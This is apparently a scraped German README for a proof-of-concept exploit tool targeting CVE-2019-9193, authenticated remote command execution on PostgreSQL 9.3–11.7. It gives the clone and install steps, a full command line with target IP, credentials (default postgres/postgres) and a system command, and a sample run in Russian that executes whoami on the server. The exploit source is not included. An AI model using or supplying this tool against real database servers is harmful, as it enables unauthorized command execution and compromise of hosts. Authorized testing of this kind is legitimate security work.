
ist ein PoC-Tool, das entwickelt wurde, um eine authentifizierte Remote Code Execution (RCE)-Sicherheitslücke in bestimmten Versionen von PostgreSQL (9.3 - 11.7) auszunutzen.
GenPostgresRCEExploit ist ein PoC-Tool, das eine authentifizierte Remote-Code-Execution-Schwachstelle (RCE) in bestimmten PostgreSQL-Versionen (9.3 – 11.7) ausnutzt. Es ermöglicht authentifizierten Benutzern, Systembefehle auf einem PostgreSQL-Datenbankserver auszuführen, der für CVE-2019-9193 anfällig ist.
psycopg2-Paket)git clone https://github.com/geniuszly/CVE-2019-9193
cd CVE-2019-9193
pip install -r requirements.txt
python3 GenPostgresRCEExploit.py -i <Ziel-IP> -p <Port> -d <Datenbankname> -U <Benutzername> -P <Passwort> -c "<Systembefehl>"
-i, --ip: IP-Adresse des PostgreSQL-Servers (Standard: 127.0.0.1)-p, --port: Port des PostgreSQL-Servers (Standard: 5432)-d, --database: Name der PostgreSQL-Datenbank (Standard: template1)-U, --user: Benutzername für die Verbindung zum PostgreSQL-Server (Standard: postgres)-P, --password: Passwort für die Verbindung zum PostgreSQL-Server (Standard: postgres)-c, --command: Systembefehl, der auf dem Server ausgeführt werden soll-t, --timeout: Verbindungs-Timeout in Sekunden (Standard: 10)python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c "whoami"
Dieses Beispiel stellt eine Verbindung zu einem PostgreSQL-Server unter 192.168.1.10 her, authentifiziert sich mit den angegebenen Anmeldedaten und führt den Befehl whoami aus.
$ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c "whoami"
[+] Подключение к базе данных PostgreSQL на 192.168.1.10:5432
[+] Соединение успешно установлено
[+] Проверка версии PostgreSQL
[+] Уязвимая версия PostgreSQL обнаружена: 10.4
[+] Создание временной таблицы: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
[+] Команда успешно выполнена
postgres
Dieses Tool ist ausschließlich für Bildungszwecke und ethische Tests gedacht. Die unbefugte Nutzung dieses Tools gegen Systeme ist illegal und strengstens untersagt. Die Autoren übernehmen keine Haftung für Missbrauch.